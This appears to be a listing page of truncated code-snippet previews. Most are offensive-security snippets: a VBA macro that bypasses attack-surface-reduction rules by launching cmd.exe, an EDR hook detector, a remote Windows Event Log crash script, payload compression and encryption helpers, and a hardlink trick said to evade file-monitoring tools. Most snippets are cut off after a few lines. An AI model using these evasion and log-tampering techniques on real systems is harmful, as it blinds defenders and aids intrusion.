| See http://stackoverflow.com/questions/2947990/using-ikvm-to-convert-a-jar-flying-saucer-xhtmlrenderer | |
| I wanted to use the Flying Saucer Java API in .NET so I tried to use IKVM to convert the Flying Saucer library: | |
| ikvmc core-renderer.jar | |
| For some reason, IKVMC gave me an exe core-renderer.exe so I renamed it to core-renderer.dll, added to my assemblies and hacked away | |
| using java.io; | |
| using java.lang; | |
| using com.lowagie.text; |
| #[ | |
| Requires the zippy library ("nimble install zippy") | |
| References: | |
| - https://github.com/byt3bl33d3r/SILENTTRINITY/blob/master/silenttrinity/core/teamserver/utils.py#L22 | |
| - https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1 | |
| ]# | |
| import zippy/[inflate, deflate] | |
| import base64 |
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
| // Add a reference to "WUAPI 2.0 Type Library" in Visual Studio | |
| // References: | |
| // - https://github.com/xonv/nagios-net-client/blob/0920114874ecc85fc7ab3a4426e547c9dc63a44a/NscaWinUpdateModule/WindowsUpdate.cs | |
| // - https://docs.microsoft.com/en-us/windows/win32/wua_sdk/portal-client | |
| using System; | |
| using WUApiLib; | |
| namespace WinUpdateTest | |
| { |
| # Original script by @Und3rf10w and @vysecurity | |
| # Modded by @byt3bl33d3r for Google Chat | |
| import java.net.URLEncoder; | |
| import java.io.BufferedReader; | |
| import java.io.DataOutputStream; | |
| import java.io.InputStreamReader; | |
| import java.net.HttpURLConnection; | |
| import java.net.URL; |
| #[ | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: BSD 3-Clause | |
| AES256-CTR Encryption/Decryption | |
| ]# | |
| import nimcrypto | |
| import nimcrypto/sysrand |
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
| # Crash the Windows Event Log Service remotely, needs Admin privs | |
| # originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r | |
| # | |
| # Once the service crashes 3 times it will not restart for 24 hours | |
| # | |
| # https://github.com/limbenjamin/LogServiceCrash | |
| # https://limbenjamin.com/articles/crash-windows-event-logging-service.html | |
| # | |
| # Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html